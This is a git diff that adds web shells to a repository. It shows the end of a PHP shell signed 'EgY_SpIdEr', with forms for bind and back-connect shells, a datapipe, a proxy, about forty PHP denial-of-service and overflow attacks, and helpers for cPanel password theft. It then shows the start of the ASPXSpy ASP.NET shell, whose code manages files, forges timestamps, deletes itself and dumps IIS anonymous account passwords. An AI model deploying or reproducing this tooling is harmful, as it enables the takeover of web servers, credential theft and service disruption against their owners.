+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','proxy_port',10,'31337'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo $table_up1.div_title($lang[$language.'_text81'],'id5525555').$table_up2.div('id5525555').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port1',35,'9999').ws(4).in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe."</tr></div></table>";
+
+
+echo $table_up1.div_title($lang[$language.'_text140'],'id38').$table_up2.div('id38').$ts."<tr><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos1').in('submit','submit',0,'Recursive memory exhaustion').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos2').in('submit','submit',0,'Memory_limit [pack()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos3').in('submit','submit',0,'BoF [unserialize()]').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos4').in('submit','submit',0,'BoF ZendEngine').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos5').in('submit','submit',0,'SQlite [dl()] vuln').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos6').in('submit','submit',0,'PCRE [preg_match()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos7').in('submit','submit',0,'Mem_limit [str_repeat()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos8').in('submit','submit',0,'Apache process killer').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos9').in('submit','submit',0,'Overload [tempnam()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos10').in('submit','submit',0,'BoF [wordwrap()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos11').in('submit','submit',0,'BoF [array_fill()](PHP<5.1.2)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos12').in('submit','submit',0,'BoF [substr_compare()](PHP<5.1.2)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos13').in('submit','submit',0,'Arr. Cr. 64b[unserialize()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos14').in('submit','submit',0,'BoF [str_ireplace()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos15').in('submit','submit',0,'BoF [htmlentities()](PHP<5.1.6,4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos16').in('submit','submit',0,'BoF [zip_entry_read()](PHP<4.4.5)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos17').in('submit','submit',0,'BoF [sqlite_udf_decode_binary()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos18').in('submit','submit',0,'BoF [msg_receive()](PHP<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos19').in('submit','submit',0,'BoF [php_stream_filter_create()](PHP5<5.2.1)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos20').in('submit','submit',0,'BoF [unserialize()](PHP<4.4.4)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos21').in('submit','submit',0,'BoF [gdImageCreateTrueColor()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos22').in('submit','submit',0,'BoF [gdImageCopyResized()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos23').in('submit','submit',0,'DoS [iconv_substr()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos24').in('submit','submit',0,'DoS [setlocale()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos25').in('submit','submit',0,'DoS [glob()] 1 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos26').in('submit','submit',0,'DoS [glob()] 2 (PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos27').in('submit','submit',0,'DoS [fnmatch()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos28').in('submit','submit',0,'BoF [imagepsloadfont()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos29').in('submit','submit',0,'BoF mSQL [msql_connect](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos30').in('submit','submit',0,'BoF [chunk_split()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos31').in('submit','submit',0,'BoF [php_win32sti.dl](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos32').in('submit','submit',0,'BoF [php_iisfunc.dll](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos33').in('submit','submit',0,'BoF [ntuser_getuserlist()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos34').in('submit','submit',0,'DoS [com_print_typeinfo()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos35').in('submit','submit',0,'BoF [iconv()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos36').in('submit','submit',0,'BoF [iconv_m_d_headers()](PHP<5.2.x)').$fe);
+echo $te."</td><td valign=top width=25%>".$ts;
+echo "<font face=Verdana color=red size=-2><b><div align=center id='n'>".$lang[$language.'_text141']."</div></b></font>";
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos37').in('submit','submit',0,'BoF [iconv_mime_decode()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos38').in('submit','submit',0,'BoF [iconv_strlen()](PHP<5.2.x)').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos39').in('submit','submit',0,'BoF [printf()](PHP<5.2.5) and prior').$fe);
+echo sr(10,"",$fs.in('hidden','cmd',0,'dos40').in('submit','submit',0,'BoF [mssql_connect(), mssql_pconnect()](PHP<4.4.6) and prior').$fe);
+/*echo sr(10,"",$fs.in('hidden','cmd',0,'dos').in('submit','submit',0,'BoF [()](PHP<5.2.x)').$fe);*/
+echo $te."</td></tr></div></table>";
+echo $fs.$table_up1.div_title($lang[$language.'_text211'],'id11111').$table_up2.div('id11111').$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'.htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text228']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_vb',10,'vb_hacker.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text230']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','egy_cp',10,'pass_cpanel.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
+echo $te.'</div>'.$table_end1.$fe;
+{
+
+
+
+
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+echo $te."</td></tr></div></table>";
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ EgY_SpIdEr | </a> | <a egy_spider@hotmail.com>egy_spider@hotmail.com</a> developer by EgY SpIdEr   ]---o</b></font></div></td></tr></table>";
+echo '</body></html>';
+?>
diff --git a/php/aspx.php b/php/aspx.php
new file mode 100644
index 0000000..c108f24
--- /dev/null
+++ b/php/aspx.php
@@ -0,0 +1,2590 @@
+<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>
+<%@ import Namespace="System.IO"%>
+<%@ import Namespace="System.Diagnostics"%>
+<%@ import Namespace="System.Data"%>
+<%@ import Namespace="System.Management"%>
+<%@ import Namespace="System.Data.OleDb"%>
+<%@ import Namespace="Microsoft.Win32"%>
+<%@ import Namespace="System.Net.Sockets" %>
+<%@ import Namespace="System.Net" %>
+<%@ import Namespace="System.Runtime.InteropServices"%>
+<%@ import Namespace="System.DirectoryServices"%>
+<%@ import Namespace="System.ServiceProcess"%>
+<%@ import Namespace="System.Text.RegularExpressions"%>
+<%@ Import Namespace="System.Threading"%>
+<%@ Import Namespace="System.Data.SqlClient"%>
+<%@ import Namespace="Microsoft.VisualBasic"%>
+<%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>
+<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<script runat="server">
+/*
+Thanks Snailsor,FuYu,BloodSword,Cnqing,
+Code by Bin
+Make in China
+Blog: http://alikaptanoglu.blogspot.com
+E-mail : ali_kaptanoglu@hotmail.com
+*/
+public string Password="21232f297a57a5a743894a0e4a801fc3";//admin
+public string vbhLn="ASPXSpy";
+public int TdgGU=1;
+protected OleDbConnection Dtdr=new OleDbConnection();
+protected OleDbCommand Kkvb=new OleDbCommand();
+public NetworkStream NS=null;
+public NetworkStream NS1=null;
+TcpClient tcp=new TcpClient();
+TcpClient zvxm=new TcpClient();
+ArrayList IVc=new ArrayList();
+protected void Page_load(object sender,EventArgs e)
+{
+YFcNP(this);
+fhAEn();
+if (!pdo())
+{
+return;
+}
+if(IsPostBack)
+{
+string tkI=Request["__EVENTTARGET"];
+string VqV=Request["__File"];
+if(tkI!="")
+{
+switch(tkI)
+{
+case "Bin_Parent":
+krIR(Ebgw(VqV));
+break;
+case "Bin_Listdir":
+krIR(Ebgw(VqV));
+break;
+case "kRXgt":
+kRXgt(Ebgw(VqV));
+break;
+case "Bin_Createfile":
+gLKc(VqV);
+break;
+case "Bin_Editfile":
+gLKc(VqV);
+break;
+case "Bin_Createdir":
+stNPw(VqV);
+break;
+case "cYAl":
+cYAl(VqV);
+break;
+case "ksGR":
+ksGR(Ebgw(VqV));
+break;
+case "SJv":
+SJv(VqV);
+break;
+case "Bin_Regread":
+tpRQ(Ebgw(VqV));
+break;
+case "hae":
+hae();
+break;
+case "urJG":
+urJG(VqV);
+break;
+}
+if(tkI.StartsWith("dAJTD"))
+{
+dAJTD(Ebgw(tkI.Replace("dAJTD","")),VqV);
+}
+else if(tkI.StartsWith("Tlvz"))
+{
+Tlvz(Ebgw(tkI.Replace("Tlvz","")),VqV);
+}
+else if(tkI.StartsWith("Bin_CFile"))
+{
+YByN(Ebgw(tkI.Replace("Bin_CFile","")),VqV);
+}
+}
+}
+else
+{
+PBZw();
+}
+}
+public bool pdo()
+{
+if(Request.Cookies[vbhLn]==null)
+{
+tZSx();
+return false;
+}
+else
+{
+if (Request.Cookies[vbhLn].Value != Password)
+{
+tZSx();
+return false;
+}
+else
+{
+return true;
+}
+}
+}
+public void tZSx()
+{
+ljtzC.Visible=true;
+ZVS.Visible=false;
+}
+protected void YKpI(object sender,EventArgs e)
+{
+Session.Abandon();
+Response.Cookies.Add(new HttpCookie(vbhLn,null));
+tZSx();
+}
+public void PBZw()
+{
+ZVS.Visible=true;
+ljtzC.Visible=false;
+Bin_Button_CreateFile.Attributes["onClick"]="var filename=prompt('Please input the file name:','');if(filename){Bin_PostBack('Bin_Createfile',filename);}";
+Bin_Button_CreateDir.Attributes["onClick"]="var filename=prompt('Please input the directory name:','');if(filename){Bin_PostBack('Bin_Createdir',filename);}";
+Bin_Button_KillMe.Attributes["onClick"]="if(confirm('Are you sure delete ASPXSPY?')){Bin_PostBack('hae','');};";
+Bin_Span_Sname.InnerHtml=Request.ServerVariables["LOCAL_ADDR"]+":"+Request.ServerVariables["SERVER_PORT"]+"("+Request.ServerVariables["SERVER_NAME"]+")";
+Bin_Span_FrameVersion.InnerHtml="Framework Ver : "+Environment.Version.ToString();
+if (AXSbb.Value==string.Empty)
+{
+AXSbb.Value=OElM(Server.MapPath("."));
+}
+Bin_H2_Title.InnerText="File Manager >>";
+krIR(AXSbb.Value);
+}
+public void fhAEn()
+{
+try
+{
+string[] YRgt=Directory.GetLogicalDrives();
+for(int i=0;i<YRgt.Length;i++)
+{
+Control c=ParseControl(" <asp:LinkButton Text='"+mFvj(YRgt[i])+"' ID=\"Bin_Button_Driv"+i+"\" runat='server' commandargument= '"+YRgt[i]+"'/> | ");
+Bin_Span_Drv.Controls.Add(c);
+LinkButton nxeDR=(LinkButton)Page.FindControl("Bin_Button_Driv"+i);
+nxeDR.Command+=new CommandEventHandler(this.iVk);
+}
+}catch(Exception ex){}
+}
+public string OElM(string path)
+{
+if(path.Substring(path.Length-1,1)!=@"\")
+{
+path=path+@"\";
+}
+return path;
+}
+public string nrrx(string path)
+{
+char[] trim={'\\'};
+if(path.Substring(path.Length-1,1)==@"\")
+{
+path=path.TrimEnd(trim);
+}
+return path;
+}
+[DllImport("kernel32.dll",EntryPoint="GetDriveTypeA")]
+public static extern int OMZP(string nDrive);
+public string mFvj(string instr)
+{
+string EuXD=string.Empty;
+int num=OMZP(instr);
+switch(num)
+{
+case 1:
+EuXD="Unknow("+instr+")";
+break;
+case 2:
+EuXD="Removable("+instr+")";
+break;
+case 3:
+EuXD="Fixed("+instr+")";
+break;
+case 4:
+EuXD="Network("+instr+")";
+break;
+case 5:
+EuXD="CDRom("+instr+")";
+break;
+case 6:
+EuXD="RAM Disk("+instr+")";
+break;
+}
+return EuXD.Replace(@"\","");
+}
+public string MVVJ(string instr)
+{
+byte[] tmp=Encoding.Default.GetBytes(instr);
+return Convert.ToBase64String(tmp);
+}
+public string Ebgw(string instr)
+{
+byte[] tmp=Convert.FromBase64String(instr);
+return Encoding.Default.GetString(tmp);
+}
+public void krIR(string path)
+{
+WICxe();
+CzfO.Visible=true;
+Bin_H2_Title.InnerText="File Manager >>";
+AXSbb.Value=OElM(path);
+DirectoryInfo GQMM=new DirectoryInfo(path);
+if(Directory.GetParent(nrrx(path))!=null)
+{
+string bg=OKM();
+TableRow p=new TableRow();
+for(int i=1;i<6;i++)
+{
+TableCell pc=new TableCell();
+if(i==1)
+{
+pc.Width=Unit.Parse("2%");
+pc.Text="0";
+p.CssClass=bg;
+}
+if(i==2)
+{
+pc.Text="<a href=\"javascript:Bin_PostBack('Bin_Parent','"+MVVJ(Directory.GetParent(nrrx(path)).ToString())+"')\">Parent Directory</a>";
+}
+p.Cells.Add(pc);
+UGzP.Rows.Add(p);
+}
+}
+try
+{
+int vLlH=0;
+foreach(DirectoryInfo Bin_folder in GQMM.GetDirectories())
+{
+string bg=OKM();
+vLlH++;
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+tc.Width=Unit.Parse("2%");
+tc.Text="0";
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=bg;
+tr.Attributes["onmouseout"]="this.className='"+bg+"';";
+tr.Cells.Add(tc);
+TableCell HczyN=new TableCell();
+HczyN.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')\">"+Bin_folder.Name+"</a>";
+tr.Cells.Add(HczyN);
+TableCell LYZK=new TableCell();
+LYZK.Text=Bin_folder.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
+tr.Cells.Add(LYZK);
+UGzP.Rows.Add(tr);
+TableCell ERUL=new TableCell();
+ERUL.Text="--";
+tr.Cells.Add(ERUL);
+UGzP.Rows.Add(tr);
+TableCell ZGKh=new TableCell();
+ZGKh.Text="<a href=\"javascript:if(confirm('Are you sure will delete it ?\\n\\nIf non-empty directory,will be delete all the files.')){Bin_PostBack('kRXgt','"+MVVJ(AXSbb.Value+Bin_folder.Name)+"')};\">Del</a> | <a href='#' onclick=\"var filename=prompt('Please input the new folder name:','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_folder.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('dAJTD"+MVVJ(AXSbb.Value+Bin_folder.Name)+"',filename);} \">Rename</a>";
+tr.Cells.Add(ZGKh);
+UGzP.Rows.Add(tr);
+}
+TableRow cKVA=new TableRow();
+cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";
+cKVA.Attributes["bgcolor"]="#dddddd";
+TableCell JlmW=new TableCell();
+JlmW.Attributes["colspan"]="6" ;
+JlmW.Attributes["height"]="5";
+cKVA.Cells.Add(JlmW);
+UGzP.Rows.Add(cKVA);
+int aYRwo=0;
+foreach(FileInfo Bin_Files in GQMM.GetFiles())
+{
+aYRwo++;
+string gb=OKM();
+TableRow tr=new TableRow();
+TableCell tc=new TableCell();
+tc.Width=Unit.Parse("2%");
+tc.Text="<input type=\"checkbox\" value=\"0\" name=\""+MVVJ(Bin_Files.Name)+"\">";
+tr.Attributes["onmouseover"]="this.className='focus';";
+tr.CssClass=gb;
+tr.Attributes["onmouseout"]="this.className='"+gb+"';";
+tr.Cells.Add(tc);
+TableCell filename=new TableCell();
+if(Bin_Files.FullName.StartsWith(Request.PhysicalApplicationPath))
+{
+string url=Request.Url.ToString();
+filename.Text="<a href=\""+Bin_Files.FullName.Replace(Request.PhysicalApplicationPath,url.Substring(0,url.IndexOf('/',8)+1)).Replace("\\","/")+"\" target=\"_blank\">"+Bin_Files.Name+"</a>";
+}
+else
+{
+filename.Text=Bin_Files.Name;
+}
+TableCell albt=new TableCell();
+albt.Text=Bin_Files.LastWriteTimeUtc.ToString("yyyy-MM-dd hh:mm:ss");
+TableCell YzK=new TableCell();
+YzK.Text=mTG(Bin_Files.Length);
+TableCell GLpi=new TableCell();
+GLpi.Text="<a href=\"#\" onclick=\"Bin_PostBack('ksGR','"+MVVJ(AXSbb.Value+Bin_Files.Name)+"')\">Down</a> | <a href='#' onclick=\"var filename=prompt('Please input the new path(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Bin_CFile"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Copy</a> | <a href=\"#\" onclick=\"Bin_PostBack('Bin_Editfile','"+Bin_Files.Name+"')\">Edit</a> | <a href='#' onclick=\"var filename=prompt('Please input the new file name(full path):','"+AXSbb.Value.Replace(@"\",@"\\")+Bin_Files.Name.Replace("'","\\'")+"');if(filename){Bin_PostBack('Tlvz"+MVVJ(AXSbb.Value+Bin_Files.Name)+"',filename);} \">Rename</a> | <a href=\"#\" onclick=\"Bin_PostBack('cYAl','"+Bin_Files.Name+"')\">Time</a> ";
+tr.Cells.Add(filename);
+tr.Cells.Add(albt);
+tr.Cells.Add(YzK);
+tr.Cells.Add(GLpi);
+UGzP.Rows.Add(tr);
+}
+string lgb=OKM();
+TableRow oWam=new TableRow();
+oWam.CssClass=lgb;
+for(int i=1;i<4;i++)
+{
+TableCell lGV=new TableCell();
+if(i==1)
+{
+lGV.Text="<input name=\"chkall\" value=\"on\" type=\"checkbox\" onclick=\"var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].type=='checkbox'&&ck[i].name!='chkall'){ck[i].checked=forms[0].chkall.checked;}}\"/>";
+}
+if(i==2)
+{
+lGV.Text="<a href=\"#\" Onclick=\"var d_file='';var ck=document.getElementsByTagName('input');for(var i=0;i<ck.length-1;i++){if(ck[i].checked&&ck[i].name!='chkall'){d_file+=ck[i].name+',';}};if(d_file==null || d_file==''){ return;} else {if(confirm('Are you sure delete the files ?')){Bin_PostBack('SJv',d_file)};}\">Delete selected</a>";
+}
+if(i==3)
+{
+lGV.ColumnSpan=4;
+lGV.Style.Add("text-align","right");
+lGV.Text=vLlH+" directories/ "+aYRwo+" files";
+}
+oWam.Cells.Add(lGV);
+}
+UGzP.Rows.Add(oWam);
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public string OKM()
+{
+TdgGU++;
+if(TdgGU % 2==0)
+{
+return "alt1";
+}
+else
+{
+return "alt2";
+}
+}
+public void kRXgt(string qcKu)
+{
+try
+{
+Directory.Delete(qcKu,true);
+xseuB("Directory delete new success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(Directory.GetParent(qcKu).ToString());
+}
+public void dAJTD(string sdir,string ddir)
+{
+try
+{
+Directory.Move(sdir,ddir);
+xseuB("Directory Renamed Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void Tlvz(string sfile,string dfile)
+{
+try
+{
+File.Move(sfile,dfile);
+xseuB("File Renamed Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void YByN(string spath,string dpath)
+{
+try
+{
+File.Copy(spath,dpath);
+xseuB("File Copy Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void stNPw(string path)
+{
+try
+{
+Directory.CreateDirectory(AXSbb.Value+path);
+xseuB("Directory created success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void gLKc(string path)
+{
+if(Request["__EVENTTARGET"]=="Bin_Editfile" || Request["__EVENTTARGET"]=="Bin_Createfile")
+{
+foreach(ListItem item in NdCX.Items)
+{
+if(item.Selected=true)
+{
+item.Selected=false;
+}
+}
+}
+Bin_H2_Title.InnerHtml="Create/ Edit File >>";
+WICxe();
+vrFA.Visible=true;
+if(path.IndexOf(":")< 0)
+{
+Sqon.Value=AXSbb.Value+path;
+}
+else
+{
+Sqon.Value=path;
+}
+if(File.Exists(Sqon.Value))
+{
+StreamReader sr;
+if(NdCX.SelectedItem.Text=="UTF-8")
+{
+sr=new StreamReader(Sqon.Value,Encoding.UTF8);
+}
+else
+{
+sr=new StreamReader(Sqon.Value,Encoding.Default);
+}
+Xgvv.InnerText=sr.ReadToEnd();
+sr.Close();
+}
+else
+{
+Xgvv.InnerText=string.Empty;
+}
+}
+public void ksGR(string path)
+{
+FileInfo fs=new FileInfo(path);
+Response.Clear();
+Page.Response.ClearHeaders();
+Page.Response.Buffer=false;
+this.EnableViewState=false;
+Response.AddHeader("Content-Disposition","attachment;filename="+HttpUtility.UrlEncode(fs.Name,System.Text.Encoding.UTF8));
+Response.AddHeader("Content-Length",fs.Length.ToString());
+Page.Response.ContentType="application/unknown";
+Response.WriteFile(fs.FullName);
+Page.Response.Flush();
+Page.Response.Close();
+Response.End();
+Page.Response.Clear();
+}
+public void SJv(string path)
+{
+try
+{
+string[] spdT=path.Split(',');
+for(int i=0;i<spdT.Length-1;i++)
+{
+File.Delete(AXSbb.Value+Ebgw(spdT[i]));
+}
+xseuB("File Delete Success !");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+krIR(AXSbb.Value);
+}
+public void hae()
+{
+try
+{
+File.Delete(Request.PhysicalPath);
+Response.Redirect("http://www.rootkit.net.cn");
+}
+catch(Exception error)
+{
+xseuB(error.Message);
+}
+}
+public void cYAl(string path)
+{
+Bin_H2_Title.InnerHtml="Clone file was last modified time >>";
+WICxe();
+zRyG.Visible=true;
+QiFB.Value=AXSbb.Value+path;
+lICp.Value=AXSbb.Value;
+pWVL.Value=AXSbb.Value+path;
+string Att=File.GetAttributes(QiFB.Value).ToString();
+if(Att.LastIndexOf("ReadOnly")!=-1)
+{
+ZhWSK.Checked=true;
+}
+if(Att.LastIndexOf("System")!=-1)
+{
+SsR.Checked=true;
+}
+if(Att.LastIndexOf("Hidden")!=-1)
+{
+ccB.Checked=true;
+}
+if(Att.LastIndexOf("Archive")!=-1)
+{
+fbyZ.Checked=true;
+}
+yUqx.Value=File.GetCreationTimeUtc(pWVL.Value).ToString();
+uYjw.Value=File.GetLastWriteTimeUtc(pWVL.Value).ToString();
+aLsn.Value=File.GetLastAccessTimeUtc(pWVL.Value).ToString();
+}
+public static String mTG(Int64 fileSize)
+{
+if(fileSize<0)
+{
+throw new ArgumentOutOfRangeException("fileSize");
+}
+else if(fileSize >= 1024 * 1024 * 1024)
+{
+return string.Format("{0:########0.00} G",((Double)fileSize)/(1024 * 1024 * 1024));
+}
+else if(fileSize >= 1024 * 1024)
+{
+return string.Format("{0:####0.00} M",((Double)fileSize)/(1024 * 1024));
+}
+else if(fileSize >= 1024)
+{
+return string.Format("{0:####0.00} K",((Double)fileSize)/ 1024);
+}
+else
+{
+return string.Format("{0} B",fileSize);
+}
+}
+private bool SGde(string sSrc)
+{
+Regex reg=new Regex(@"^0|[0-9]*[1-9][0-9]*$");
+if(reg.IsMatch(sSrc))
+{
+return true;
+}
+else
+{
+return false;
+}
+}
+public void AdCx()
+{
+string qcKu=string.Empty;
+string mWGEm="IIS://localhost/W3SVC";
+GlI.Style.Add("word-break","break-all");
+try
+{
+DirectoryEntry HHzcY=new DirectoryEntry(mWGEm);
+int fmW=0;
+foreach(DirectoryEntry child in HHzcY.Children)
+{
+if(SGde(child.Name.ToString()))
+{
+fmW++;
+DirectoryEntry newdir=new DirectoryEntry(mWGEm+"/"+child.Name.ToString());
+DirectoryEntry HlyU=newdir.Children.Find("root","IIsWebVirtualDir");
+string bg=OKM();
+TableRow TR=new TableRow();
+TR.Attributes["onmouseover"]="this.className='focus';";
+TR.CssClass=bg;
+TR.Attributes["onmouseout"]="this.className='"+bg+"';";
+TR.Attributes["title"]="Site:"+child.Properties["ServerComment"].Value.ToString();
+for(int i=1;i<6;i++)
+{
+try
+{
+TableCell tfit=new TableCell();
+switch(i)
+{case 1:
+tfit.Text=fmW.ToString();
+break;
+case 2:
+tfit.Text=HlyU.Properties["AnonymousUserName"].Value.ToString();
+break;
+case 3:
+tfit.Text=HlyU.Properties["AnonymousUserPass"].Value.ToString();
+break;
+case 4:
+StringBuilder sb=new StringBuilder();
+PropertyValueCollection pc=child.Properties["ServerBindings"];
+for (int j=0; j < pc.Count; j++)
+{
+sb.Append(pc[j].ToString()+"<br>");
+}
+tfit.Text=sb.ToString().Substring(0,sb.ToString().Length-4);
+break;
+case 5:
+tfit.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(HlyU.Properties["Path"].Value.ToString())+"')\">"+HlyU.Properties["Path"].Value.ToString()+"</a>";
+break;
+}
+TR.Cells.Add(tfit);
+}
+catch (Exception ex)
+{
